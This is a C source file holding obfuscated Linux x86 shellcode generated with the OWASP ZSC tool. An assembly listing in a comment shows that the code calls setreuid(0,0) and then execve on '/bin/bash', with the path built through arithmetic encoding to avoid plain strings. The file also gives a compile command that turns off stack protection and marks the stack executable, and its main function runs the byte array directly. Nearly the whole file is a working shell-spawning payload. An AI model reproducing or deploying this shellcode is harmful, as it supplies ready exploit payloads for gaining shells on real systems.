
#include <stdio.h>
#include <string.h>
/*
This shellcode generated by ZCR Shellcoder [OWASP ZSC]
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
http://zsc.z3r0d4y.com/
owasp-zsc-tool-project@lists.owasp.org

Title: exec('/bin'bash')
OS: linux_x86
Encode: mix_all
Length: 79

push $0x4f
pop %eax
sub $0x09,%eax
xor %ebx,%ebx
xor %ecx,%ecx
int $0x80
push $0x52315878
pop %ebx
push $0xbac1e908
pop %eax
sub %ebx,%eax
push %eax
pop %ebx
shr $0x10,%ebx
shr $0x8,%ebx
push %ebx
push $0x4839544c
pop %ebx
push $0xbb9ab673
pop %eax
sub %ebx,%eax
push %eax
push $0x4e694c65
pop %ebx
push $0xbcd2ae94
pop %eax
sub %ebx,%eax
push %eax
mov %esp,%ebx
xor %eax,%eax
mov $0xb,%al
int $0x80
mov $0x1,%al
mov $0x1,%bl
int $0x80



compile example: gcc -ggdb -static -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o shellcode_compiled shellcode.c
*/
 
int main(){
unsigned char shellcode[]= "\x6a\x4f\x58\x83\xe8\x09\x31\xdb\x31\xc9\xcd\x80\x68\x78\x58\x31\x52\x5b\x68\x08\xe9\xc1\xba\x58\x29\xd8\x50\x5b\xc1\xeb\x10\xc1\xeb\x08\x53\x68\x4c\x54\x39\x48\x5b\x68\x73\xb6\x9a\xbb\x58\x29\xd8\x50\x68\x65\x4c\x69\x4e\x5b\x68\x94\xae\xd2\xbc\x58\x29\xd8\x50\x89\xe3\x31\xc0\xb0\x0b\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
    (*(void(*)()) shellcode)();
}
